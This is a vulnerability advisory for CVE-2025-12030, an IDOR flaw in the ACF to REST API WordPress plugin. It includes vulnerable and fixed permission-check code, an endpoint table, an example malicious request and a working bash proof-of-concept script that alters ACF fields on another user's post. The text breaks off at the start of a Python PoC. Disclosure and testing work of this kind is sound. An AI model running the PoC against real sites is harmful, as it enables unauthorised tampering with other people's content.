
ACF to REST API WordPress Plugin IDOR Vulnerability (CVE-2025-12030) - Security flaw allowing authenticated users with Contributor-level access to modify ACF fields on objects they do not own.
Keywords: CVE-2025-12030, ACF to REST API vulnerability, IDOR, WordPress security, authenticated exploit, WordPress plugin vulnerability, CWE-639, ACF field modification, authorization bypass, WordPress CVE 2025, Advanced Custom Fields, REST API security
ACF to REST API WordPress Plugin IDOR Vulnerability (CVE-2025-12030) - Security flaw allowing authenticated users with Contributor-level access to modify ACF fields on objects they do not own.
An Insecure Direct Object Reference (IDOR) vulnerability was discovered in the ACF to REST API WordPress Plugin that allows authenticated attackers with minimal privileges to modify ACF fields across the entire WordPress installation.
Discovered by: Kai Aizen (SnailSploit)
Published: January 6, 2026
CVSS Score: 4.3 (Medium)
CWE: CWE-639 - Authorization Bypass Through User-Controlled Key
Plugin: ACF to REST API
Plugin Slug: acf-to-rest-api
Attack Type: Insecure Direct Object Reference (IDOR)
Required Privileges: Contributor+ (Authenticated Attack)
The ACF to REST API plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 3.3.4. This is due to insufficient capability checks in the update_item_permissions_check() method, which only verifies that the current user has the edit_posts capability without checking object-specific permissions (e.g., edit_post($id), edit_user($id), manage_options).
This vulnerability allows authenticated attackers with Contributor-level access and above to:
manage_options capabilityAll modifications are possible via the /wp-json/acf/v3/{type}/{id} REST API endpoints.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
| Metric | Value |
|---|---|
| Attack Vector | Network (AV:N) |
| Attack Complexity | Low (AC:L) |
| Privileges Required | Low (PR:L) |
| User Interaction | None (UI:N) |
| Scope | Unchanged (S:U) |
| Confidentiality | None (C:N) |
| Integrity | Low (I:L) |
| Availability | None (A:N) |
CVSS v3.1 Breakdown:
The vulnerability exists in the update_item_permissions_check() method which performs insufficient authorization:
// Vulnerable code pattern (simplified)
public function update_item_permissions_check( $request ) {
// VULNERABLE: Only checks generic edit_posts capability
if ( current_user_can( 'edit_posts' ) ) {
return true;
}
return false;
}
The proper implementation should check object-specific permissions:
// Secure implementation pattern
public function update_item_permissions_check( $request ) {
$id = $request->get_param( 'id' );
$type = $request->get_param( 'type' );
switch ( $type ) {
case 'post':
return current_user_can( 'edit_post', $id );
case 'user':
return current_user_can( 'edit_user', $id );
case 'option':
return current_user_can( 'manage_options' );
// ... other object types
}
return false;
}
| Endpoint | Target | Required Capability (Should Be) |
|---|---|---|
/wp-json/acf/v3/posts/{id} | Posts | edit_post($id) |
/wp-json/acf/v3/pages/{id} | Pages | edit_page($id) |
/wp-json/acf/v3/users/{id} | Users | edit_user($id) |
/wp-json/acf/v3/comments/{id} | Comments | edit_comment($id) |
/wp-json/acf/v3/terms/{taxonomy}/{id} | Terms | edit_term($id) |
/wp-json/acf/v3/options/{option} | Options | manage_options |
PUT/POST /wp-json/acf/v3/{type}/{id}
Authorization: Basic <contributor_credentials>
Content-Type: application/json
{
"fields": {
"field_name": "malicious_value"
}
}
The vulnerability can be exploited through the WordPress REST API by any authenticated user with at least Contributor role.
⚠️ For Educational and Authorized Testing Purposes Only
#!/bin/bash
# CVE-2025-12030 PoC - ACF to REST API IDOR
TARGET_URL="$1"
USERNAME="$2"
APP_PASSWORD="$3"
TARGET_POST_ID="$4"
if [ -z "$TARGET_URL" ] || [ -z "$USERNAME" ] || [ -z "$APP_PASSWORD" ] || [ -z "$TARGET_POST_ID" ]; then
echo "Usage: $0 <target_url> <username> <app_password> <post_id>"
echo "Example: $0 https://example.com contributor_user xxxx-xxxx-xxxx 42"
exit 1
fi
echo "[*] CVE-2025-12030 - ACF to REST API IDOR PoC"
echo "[*] Target: $TARGET_URL"
echo "[*] Target Post ID: $TARGET_POST_ID"
echo ""
# Encode credentials
AUTH=$(echo -n "$USERNAME:$APP_PASSWORD" | base64)
# Step 1: Read current ACF fields (verify access)
echo "[*] Step 1: Reading current ACF fields..."
curl -s -X GET "$TARGET_URL/wp-json/acf/v3/posts/$TARGET_POST_ID" \
-H "Authorization: Basic $AUTH" \
| python3 -m json.tool
echo ""
# Step 2: Attempt to modify ACF fields on post we don't own
echo "[*] Step 2: Attempting to modify ACF fields on post $TARGET_POST_ID..."
RESPONSE=$(curl -s -X POST "$TARGET_URL/wp-json/acf/v3/posts/$TARGET_POST_ID" \
-H "Authorization: Basic $AUTH" \
-H "Content-Type: application/json" \
-d '{"fields":{"test_field":"CVE-2025-12030_IDOR_TEST"}}')
echo "$RESPONSE" | python3 -m json.tool
echo ""
if echo "$RESPONSE" | grep -q "CVE-2025-12030_IDOR_TEST"; then
echo "[!] VULNERABLE: Successfully modified ACF fields on post we don't own!"
else
echo "[+] Not vulnerable or modification failed"
fi
#!/usr/bin/env python3
"""
CVE-2025-12030 - ACF to REST API IDOR PoC
For educational and authorized testing purposes only
"""
import requests
import sys
import json
import base64